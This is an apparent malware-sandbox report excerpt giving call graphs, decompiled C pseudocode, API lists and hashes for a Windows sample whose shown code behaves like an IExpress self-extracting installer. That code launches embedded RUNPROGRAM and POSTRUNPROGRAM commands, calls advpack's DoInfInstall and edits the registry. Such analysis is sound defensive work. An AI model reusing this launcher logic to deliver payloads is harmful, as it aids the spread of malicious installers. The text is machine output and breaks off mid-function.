GetPrivateProfileIntA GetPrivateProfileStringA 2992->2995 2996 1a1ea1 2993->2996 2994->2994 2999 1a1dbe LocalAlloc 2994->2999 3002 1a1cf8 2995->3002 3003 1a1cc2 2995->3003 2996->2764 2997->3005 2998->2992 2999->2984 3004 1a1de1 2999->3004 3006 1a1d09 GetShortPathNameA 3002->3006 3007 1a1d23 3002->3007 3003->2990 3008 1a171e _vsnprintf 3004->3008 3080 1a2aac 3005->3080 3006->3007 3009 1a171e _vsnprintf 3007->3009 3008->3003 3009->3003 3011 1a209a 3010->3011 3012 1a2256 3010->3012 3014 1a171e _vsnprintf 3011->3014 3017 1a20dc 3011->3017 3013 1a6ce0 4 API calls 3012->3013 3015 1a2263 3013->3015 3016 1a20af RegQueryValueExA 3014->3016 3015->2764 3016->3011 3016->3017 3018 1a20fb GetSystemDirectoryA 3017->3018 3019 1a20e4 RegCloseKey 3017->3019 3020 1a658a CharPrevA 3018->3020 3019->3012 3021 1a211b LoadLibraryA 3020->3021 3022 1a2179 GetModuleFileNameA 3021->3022 3023 1a212e GetProcAddress FreeLibrary 3021->3023 3024 1a21de RegCloseKey 3022->3024 3028 1a2177 3022->3028 3023->3022 3025 1a214e GetSystemDirectoryA 3023->3025 3024->3012 3026 1a2165 3025->3026 3025->3028 3027 1a658a CharPrevA 3026->3027 3027->3028 3028->3028 3029 1a21b7 LocalAlloc 3028->3029 3030 1a21ec 3029->3030 3031 1a21cd 3029->3031 3033 1a171e _vsnprintf 3030->3033 3032 1a44b9 20 API calls 3031->3032 3032->3024 3034 1a2218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3012 3037 1a4106 3036->3037 3038 1a4016 CreateProcessA 3036->3038 3041 1a6ce0 4 API calls 3037->3041 3039 1a4041 WaitForSingleObject GetExitCodeProcess 3038->3039 3040 1a40c4 3038->3040 3048 1a4070 3039->3048 3043 1a6285 GetLastError 3040->3043 3042 1a4117 3041->3042 3042->2764 3044 1a40c9 GetLastError FormatMessageA 3043->3044 3046 1a44b9 20 API calls 3044->3046 3046->3037 3047 1a4096 CloseHandle CloseHandle 3047->3037 3049 1a40ba 3047->3049 3107 1a411b 3048->3107 3049->3037 3051 1a64c2 3050->3051 3052 1a658a CharPrevA 3051->3052 3053 1a64d8 GetFileAttributesA 3052->3053 3054 1a64ea 3053->3054 3055 1a6501 LoadLibraryA 3053->3055 
3054->3055 3056 1a64ee LoadLibraryExA 3054->3056 3057 1a6508 3055->3057 3056->3057 3058 1a6ce0 4 API calls 3057->3058 3059 1a6513 3058->3059 3059->2785 3061 1a2289 RegOpenKeyExA 3060->3061 3062 1a2381 3060->3062 3061->3062 3063 1a22b1 RegQueryValueExA 3061->3063 3064 1a6ce0 4 API calls 3062->3064 3066 1a22e6 memset GetSystemDirectoryA 3063->3066 3067 1a2374 RegCloseKey 3063->3067 3065 1a238c 3064->3065 3065->2763 3068 1a230f 3066->3068 3069 1a2321 3066->3069 3067->3062 3070 1a658a CharPrevA 3068->3070 3071 1a171e _vsnprintf 3069->3071 3070->3069 3072 1a233f RegSetValueExA 3071->3072 3072->3067 3077 1a1a9a 3074->3077 3076 1a1aba 3076->2972 3077->3076 3078 1a1aaf 3077->3078 3093 1a667f 3077->3093 3078->3076 3079 1a667f 2 API calls 3078->3079 3079->3078 3081 1a2be6 3080->3081 3082 1a2ad4 GetModuleFileNameA 3080->3082 3083 1a6ce0 4 API calls 3081->3083 3092 1a2b02 3082->3092 3085 1a2bf5 3083->3085 3084 1a2af1 IsDBCSLeadByte 3084->3092 3085->2990 3086 1a2bca CharNextA 3089 1a2bd3 CharNextA 3086->3089 3087 1a2b11 CharNextA CharUpperA 3088 1a2b8d CharUpperA 3087->3088 3087->3092 3088->3092 3089->3092 3091 1a2b43 CharPrevA 3091->3092 3092->3081 3092->3084 3092->3086 3092->3087 3092->3089 3092->3091 3098 1a65e8 3092->3098 3096 1a6689 3093->3096 3094 1a66a5 3094->3077 3095 1a6648 IsDBCSLeadByte 3095->3096 3096->3094 3096->3095 3097 1a6697 CharNextA 3096->3097 3097->3096 3099 1a65f4 3098->3099 3099->3099 3100 1a65fb CharPrevA 3099->3100 3101 1a6611 CharPrevA 3100->3101 3102 1a660b 3101->3102 3103 1a661e 3101->3103 3102->3101 3102->3103 3104 1a6627 CharPrevA 3103->3104 3105 1a6634 CharNextA 3103->3105 3106 1a663d 3103->3106 3104->3105 3104->3106 3105->3106 3106->3092 3108 1a4132 3107->3108 3110 1a412a 3107->3110 3111 1a1ea7 3108->3111 3110->3047 3112 1a1eba 3111->3112 3113 1a1ed3 3111->3113 3114 1a256d 15 API calls 3112->3114 3113->3110 3114->3113 3116 1a1ff0 RegOpenKeyExA 3115->3116 3117 1a2026 3115->3117 3116->3117 3118 1a200f RegDeleteValueA RegCloseKey 3116->3118 
3117->2479 3118->3117 3267 1a6a20 __getmainargs 3268 1a19e0 3269 1a1a03 3268->3269 3270 1a1a24 GetDesktopWindow 3268->3270 3271 1a1a20 3269->3271 3273 1a1a16 EndDialog 3269->3273 3272 1a43d0 11 API calls 3270->3272 3275 1a6ce0 4 API calls 3271->3275 3274 1a1a33 LoadStringA SetDlgItemTextA MessageBeep 3272->3274 3273->3271 3274->3271 3276 1a1a7e 3275->3276

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E001A3BA2() {
	signed int _v8;
	signed int _v12;
	char _v276;
	char _v280;
	short _v300;
	intOrPtr _v304;
	void _v348;
	char _v352;
	intOrPtr _v356;
	signed int _v360;
	short _v364;
	char* _v368;
	intOrPtr _v372;
	void* _v376;
	intOrPtr _v380;
	char _v384;
	signed int _v388;
	intOrPtr _v392;
	signed int _v396;
	signed int _v400;
	signed int _v404;
	void* _v408;
	void* _v424;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t69;
	signed int _t76;
	void* _t77;
	signed int _t79;
	short _t96;
	signed int _t97;
	intOrPtr _t98;
	signed int _t101;
	signed int _t104;
	signed int _t108;
	int _t112;
	void* _t115;
	signed char _t118;
	void* _t125;
	signed int _t127;
	void* _t128;
	struct HINSTANCE__* _t129;
	void* _t130;
	short _t137;
	char* _t140;
	signed char _t144;
	signed char _t145;
	signed int _t149;
	void* _t150;
	void* _t151;
	signed int _t153;
	void* _t155;
	void* _t156;
	signed int _t157;
	signed int _t162;
	signed int _t164;
	void* _t165;

	_t164 = (_t162 & 0xfffffff8) - 0x194;
	_t69 =  *0x1a8004; // 0x56898003
	_v8 = _t69 ^ _t164;
	_t153 = 0;
	 *0x1a9124 =  *0x1a9124 & 0;
	_t149 = 0;
	_v388 = 0;
	_v384 = 0;
	_t165 =  *0x1a8a28 - _t153; // 0x0
	if(_t165 != 0) {
		L3:
		_t127 = 0;
		_v392 = 0;
		while(1) {
			_v400 = _v400 & 0x00000000;
			memset( &_v348, 0, 0x44);
			_t164 = _t164 + 0xc;
			_v348 = 0x44;
			if( *0x1a8c42 != 0) {
				goto L26;
			}
			_t146 =  &_v396;
			_t115 = E001A468F("SHOWWINDOW",  &_v396, 4);
			if(_t115 == 0 || _t115 > 4) {
				L25:
				_t146 = 0x4b1;
				E001A44B9(0, 0x4b1, 0, 0, 0x10, 0);
				 *0x1a9124 = 0x80070714;
				goto L62;
			} else {
				if(_v396 != 1) {
					__eflags = _v396 - 2;
					if(_v396 != 2) {
						_t137 = 3;
						__eflags = _v396 - _t137;
						if(_v396 == _t137) {
							_v304 = 1;
							_v300 = _t137;
						}
						goto L14;
					}
					_push(6);
					_v304 = 1;
					_pop(0);
					goto L11;
				} else {
					_v304 = 1;
					L11:
					_v300 = 0;
					L14:
					if(_t127 != 0) {
						L27:
						_t155 = 1;
						__eflags = _t127 - 1;
						if(_t127 != 1) {
							L31:
							_t132 =  &_v280;
							_t76 = E001A1AE8( &_v280,  &_v408,  &_v404); // executed
							__eflags = _t76;
							if(_t76 == 0) {
								L62:
								_t77 = 0;
								L63:
								_pop(_t150);
								_pop(_t156);
								_pop(_t128);
								return E001A6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
							}
							_t157 = _v404;
							__eflags = _t149;
							if(_t149 != 0) {
								L37:
								__eflags = _t157;
								if(_t157 == 0) {
									L57:
									_t151 = _v408;
									_t146 =  &_v352;
									_t130 = _t151; // executed
									_t79 = E001A3FEF(_t130,  &_v352); // executed
									__eflags = _t79;
									if(_t79 == 0) {
                                                                                                                                                                                                                                              													L61:
                                                                                                                                                                                                                                              													LocalFree(_t151);
                                                                                                                                                                                                                                              													goto L62;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												L58:
                                                                                                                                                                                                                                              												LocalFree(_t151);
                                                                                                                                                                                                                                              												_t127 = _t127 + 1;
                                                                                                                                                                                                                                              												_v396 = _t127;
                                                                                                                                                                                                                                              												__eflags = _t127 - 2;
                                                                                                                                                                                                                                              												if(_t127 >= 2) {
                                                                                                                                                                                                                                              													_t155 = 1;
                                                                                                                                                                                                                                              													__eflags = 1;
                                                                                                                                                                                                                                              													L69:
                                                                                                                                                                                                                                              													__eflags =  *0x1a8580;
                                                                                                                                                                                                                                              													if( *0x1a8580 != 0) {
                                                                                                                                                                                                                                              														E001A2267();
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              													_t77 = _t155;
                                                                                                                                                                                                                                              													goto L63;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												_t153 = _v392;
                                                                                                                                                                                                                                              												_t149 = _v388;
                                                                                                                                                                                                                                              												continue;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											L38:
                                                                                                                                                                                                                                              											__eflags =  *0x1a8180;
                                                                                                                                                                                                                                              											if( *0x1a8180 == 0) {
                                                                                                                                                                                                                                              												_t146 = 0x4c7;
                                                                                                                                                                                                                                              												E001A44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              												LocalFree(_v424);
                                                                                                                                                                                                                                              												 *0x1a9124 = 0x8007042b;
                                                                                                                                                                                                                                              												goto L62;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t157;
                                                                                                                                                                                                                                              											if(_t157 == 0) {
                                                                                                                                                                                                                                              												goto L57;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags =  *0x1a9a34 & 0x00000004;
                                                                                                                                                                                                                                              											if(__eflags == 0) {
                                                                                                                                                                                                                                              												goto L57;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t129 = E001A6495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                              											__eflags = _t129;
                                                                                                                                                                                                                                              											if(_t129 == 0) {
                                                                                                                                                                                                                                              												_t146 = 0x4c8;
                                                                                                                                                                                                                                              												E001A44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                              												L65:
                                                                                                                                                                                                                                              												LocalFree(_v408);
                                                                                                                                                                                                                                              												 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              												goto L62;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                              											_v404 = _t146;
                                                                                                                                                                                                                                              											__eflags = _t146;
                                                                                                                                                                                                                                              											if(_t146 == 0) {
                                                                                                                                                                                                                                              												_t146 = 0x4c9;
                                                                                                                                                                                                                                              												__eflags = 0;
                                                                                                                                                                                                                                              												E001A44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                              												FreeLibrary(_t129);
                                                                                                                                                                                                                                              												goto L65;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags =  *0x1a8a30;
                                                                                                                                                                                                                                              											_t151 = _v408;
                                                                                                                                                                                                                                              											_v384 = 0;
                                                                                                                                                                                                                                              											_v368 =  &_v280;
                                                                                                                                                                                                                                              											_t96 =  *0x1a9a40; // 0x3
                                                                                                                                                                                                                                              											_v364 = _t96;
                                                                                                                                                                                                                                              											_t97 =  *0x1a8a38 & 0x0000ffff;
                                                                                                                                                                                                                                              											_v380 = 0x1a9154;
                                                                                                                                                                                                                                              											_v376 = _t151;
                                                                                                                                                                                                                                              											_v372 = 0x1a91e4;
                                                                                                                                                                                                                                              											_v360 = _t97;
                                                                                                                                                                                                                                              											if( *0x1a8a30 != 0) {
                                                                                                                                                                                                                                              												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                                                                                              												_v360 = _t97;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t144 =  *0x1a9a34; // 0x1
                                                                                                                                                                                                                                              											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                              											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                              												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                                                                                              												_v360 = _t97;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                              											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                              												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                                                                                              												_v360 = _t97;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t145 =  *0x1a8d48; // 0x0
                                                                                                                                                                                                                                              											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                              											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                              												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                                                                                              												_v360 = _t97;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t145;
                                                                                                                                                                                                                                              											if(_t145 < 0) {
                                                                                                                                                                                                                                              												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                              												__eflags = _t104;
                                                                                                                                                                                                                                              												_v360 = _t104;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t98 =  *0x1a9a38; // 0x0
                                                                                                                                                                                                                                              											_v356 = _t98;
                                                                                                                                                                                                                                              											_t130 = _t146;
                                                                                                                                                                                                                                              											 *0x1aa288( &_v384);
                                                                                                                                                                                                                                              											_t101 = _v404();
                                                                                                                                                                                                                                              											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                              											if(_t164 != _t164) {
                                                                                                                                                                                                                                              												_t130 = 4;
                                                                                                                                                                                                                                              												asm("int 0x29");
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											 *0x1a9124 = _t101;
                                                                                                                                                                                                                                              											_push(_t129);
                                                                                                                                                                                                                                              											__eflags = _t101;
                                                                                                                                                                                                                                              											if(_t101 < 0) {
                                                                                                                                                                                                                                              												FreeLibrary();
                                                                                                                                                                                                                                              												goto L61;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												FreeLibrary();
                                                                                                                                                                                                                                              												_t127 = _v400;
                                                                                                                                                                                                                                              												goto L58;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags =  *0x1a9a40 - 1; // 0x3
                                                                                                                                                                                                                                              										if(__eflags == 0) {
                                                                                                                                                                                                                                              											goto L37;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags =  *0x1a8a20;
                                                                                                                                                                                                                                              										if( *0x1a8a20 == 0) {
                                                                                                                                                                                                                                              											goto L37;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags = _t157;
                                                                                                                                                                                                                                              										if(_t157 != 0) {
                                                                                                                                                                                                                                              											goto L38;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_v388 = 1;
                                                                                                                                                                                                                                              										E001A202A(_t146); // executed
                                                                                                                                                                                                                                              										goto L37;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t146 =  &_v280;
                                                                                                                                                                                                                                              									_t108 = E001A468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                              									__eflags = _t108;
                                                                                                                                                                                                                                              									if(_t108 == 0) {
                                                                                                                                                                                                                                              										goto L25;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									__eflags =  *0x1a8c42;
                                                                                                                                                                                                                                              									if( *0x1a8c42 != 0) {
                                                                                                                                                                                                                                              										goto L69;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                              									__eflags = _t112 == 0;
                                                                                                                                                                                                                                              									if(_t112 == 0) {
                                                                                                                                                                                                                                              										goto L69;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L31;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t118 =  *0x1a8a38; // 0x0
                                                                                                                                                                                                                                              								if(_t118 == 0) {
                                                                                                                                                                                                                                              									L23:
                                                                                                                                                                                                                                              									if(_t153 != 0) {
                                                                                                                                                                                                                                              										goto L31;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t146 =  &_v276;
                                                                                                                                                                                                                                              									if(E001A468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                              										goto L27;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L25;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                              									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                              										goto L62;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t140 = "USRQCMD";
                                                                                                                                                                                                                                              									L20:
                                                                                                                                                                                                                                              									_t146 =  &_v276;
                                                                                                                                                                                                                                              									if(E001A468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                              										goto L25;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                              										_t153 = 1;
                                                                                                                                                                                                                                              										_v388 = 1;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L26:
                                                                                                                                                                                                                                              						_push(_t130);
                                                                                                                                                                                                                                              						_t146 = 0x104;
                                                                                                                                                                                                                                              						E001A1781( &_v276, 0x104, _t130, 0x1a8c42);
                                                                                                                                                                                                                                              						goto L27;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t130 = "REBOOT";
                                                                                                                                                                                                                                              				_t125 = E001A468F(_t130, 0x1a9a2c, 4);
                                                                                                                                                                                                                                              				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                              					goto L25;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                                                                              				}
			}
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3c7c
                                                                                                                                                                                                                                              0x001a3c67
                                                                                                                                                                                                                                              0x001a3c69
                                                                                                                                                                                                                                              0x001a3c6d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3c58
                                                                                                                                                                                                                                              0x001a3c58
                                                                                                                                                                                                                                              0x001a3c6e
                                                                                                                                                                                                                                              0x001a3c6e
                                                                                                                                                                                                                                              0x001a3c87
                                                                                                                                                                                                                                              0x001a3c89
                                                                                                                                                                                                                                              0x001a3d4d
                                                                                                                                                                                                                                              0x001a3d4f
                                                                                                                                                                                                                                              0x001a3d50
                                                                                                                                                                                                                                              0x001a3d52
                                                                                                                                                                                                                                              0x001a3d9e
                                                                                                                                                                                                                                              0x001a3da8
                                                                                                                                                                                                                                              0x001a3daf
                                                                                                                                                                                                                                              0x001a3db4
                                                                                                                                                                                                                                              0x001a3db6
                                                                                                                                                                                                                                              0x001a3f4d
                                                                                                                                                                                                                                              0x001a3f4d
                                                                                                                                                                                                                                              0x001a3f4f
                                                                                                                                                                                                                                              0x001a3f56
                                                                                                                                                                                                                                              0x001a3f57
                                                                                                                                                                                                                                              0x001a3f58
                                                                                                                                                                                                                                              0x001a3f63
                                                                                                                                                                                                                                              0x001a3f63
                                                                                                                                                                                                                                              0x001a3dbc
                                                                                                                                                                                                                                              0x001a3dc0
                                                                                                                                                                                                                                              0x001a3dc2
                                                                                                                                                                                                                                              0x001a3de6
                                                                                                                                                                                                                                              0x001a3de6
                                                                                                                                                                                                                                              0x001a3de8
                                                                                                                                                                                                                                              0x001a3f0b
                                                                                                                                                                                                                                              0x001a3f0b
                                                                                                                                                                                                                                              0x001a3f0f
                                                                                                                                                                                                                                              0x001a3f13
                                                                                                                                                                                                                                              0x001a3f15
                                                                                                                                                                                                                                              0x001a3f1a
                                                                                                                                                                                                                                              0x001a3f1c
                                                                                                                                                                                                                                              0x001a3f46
                                                                                                                                                                                                                                              0x001a3f47
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3f47
                                                                                                                                                                                                                                              0x001a3f1e
                                                                                                                                                                                                                                              0x001a3f1f
                                                                                                                                                                                                                                              0x001a3f25
                                                                                                                                                                                                                                              0x001a3f26
                                                                                                                                                                                                                                              0x001a3f2a
                                                                                                                                                                                                                                              0x001a3f2d
                                                                                                                                                                                                                                              0x001a3fd9
                                                                                                                                                                                                                                              0x001a3fd9
                                                                                                                                                                                                                                              0x001a3fda
                                                                                                                                                                                                                                              0x001a3fda
                                                                                                                                                                                                                                              0x001a3fe1
                                                                                                                                                                                                                                              0x001a3fe3
                                                                                                                                                                                                                                              0x001a3fe3
                                                                                                                                                                                                                                              0x001a3fe8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3fe8
                                                                                                                                                                                                                                              0x001a3f33
                                                                                                                                                                                                                                              0x001a3f37
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3f37
                                                                                                                                                                                                                                              0x001a3dee
                                                                                                                                                                                                                                              0x001a3dee
                                                                                                                                                                                                                                              0x001a3df5
                                                                                                                                                                                                                                              0x001a3fad
                                                                                                                                                                                                                                              0x001a3fb9
                                                                                                                                                                                                                                              0x001a3fc2
                                                                                                                                                                                                                                              0x001a3fc8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3fc8
                                                                                                                                                                                                                                              0x001a3dfb
                                                                                                                                                                                                                                              0x001a3dfd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3e03
                                                                                                                                                                                                                                              0x001a3e0a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3e15
                                                                                                                                                                                                                                              0x001a3e17
                                                                                                                                                                                                                                              0x001a3e19
                                                                                                                                                                                                                                              0x001a3f94
                                                                                                                                                                                                                                              0x001a3fa4
                                                                                                                                                                                                                                              0x001a3f7c
                                                                                                                                                                                                                                              0x001a3f80
                                                                                                                                                                                                                                              0x001a3f8b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3f8b
                                                                                                                                                                                                                                              0x001a3e2c
                                                                                                                                                                                                                                              0x001a3e30
                                                                                                                                                                                                                                              0x001a3e34
                                                                                                                                                                                                                                              0x001a3e36
                                                                                                                                                                                                                                              0x001a3f69
                                                                                                                                                                                                                                              0x001a3f6e
                                                                                                                                                                                                                                              0x001a3f70
                                                                                                                                                                                                                                              0x001a3f76
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3f76
                                                                                                                                                                                                                                              0x001a3e3c
                                                                                                                                                                                                                                              0x001a3e43
                                                                                                                                                                                                                                              0x001a3e47
                                                                                                                                                                                                                                              0x001a3e52
                                                                                                                                                                                                                                              0x001a3e56
                                                                                                                                                                                                                                              0x001a3e5c
                                                                                                                                                                                                                                              0x001a3e61
                                                                                                                                                                                                                                              0x001a3e68

APIs
• memset.MSVCRT ref: 001A3C11
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 001A3CDC
  • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46A0
  • Part of subcall function 001A468F: SizeofResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46A9
  • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46C3
  • Part of subcall function 001A468F: LoadResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46CC
  • Part of subcall function 001A468F: LockResource.KERNEL32(00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46D3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: memcpy_s.MSVCRT ref: 001A46E5
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46EF
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,001A8C42), ref: 001A3D8F
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 001A3E26
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,001A8C42), ref: 001A3EFF
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,001A8C42), ref: 001A3F1F
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,001A8C42), ref: 001A3F40
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,001A8C42), ref: 001A3F47
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,001A8C42), ref: 001A3F76
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,001A8C42), ref: 001A3F80
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,001A8C42), ref: 001A3FC2
                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                              • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                              • API String ID: 1032054927-139961720
                                                                                                                                                                                                                                              • Opcode ID: 0a1d1403cc8d3b51f35dfdd5fa1d7e057f33fe5b9118e8f7e025c81f155c289b
                                                                                                                                                                                                                                              • Instruction ID: d674017c03386859adc967403a626746d39a58ad6d92668e0bf65447a963e9ed
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a1d1403cc8d3b51f35dfdd5fa1d7e057f33fe5b9118e8f7e025c81f155c289b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9B1F1B8A183019FD720DF64CD45B6B76E4EB87750F10092EFAA5D7191EB70CA84CB92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E001A1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v527;
                                                                                                                                                                                                                                              				char _v528;
                                                                                                                                                                                                                                              				char _v1552;
                                                                                                                                                                                                                                              				CHAR* _v1556;
                                                                                                                                                                                                                                              				int* _v1560;
                                                                                                                                                                                                                                              				CHAR** _v1564;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t48;
                                                                                                                                                                                                                                              				CHAR* _t53;
                                                                                                                                                                                                                                              				CHAR* _t54;
                                                                                                                                                                                                                                              				char* _t57;
                                                                                                                                                                                                                                              				char* _t58;
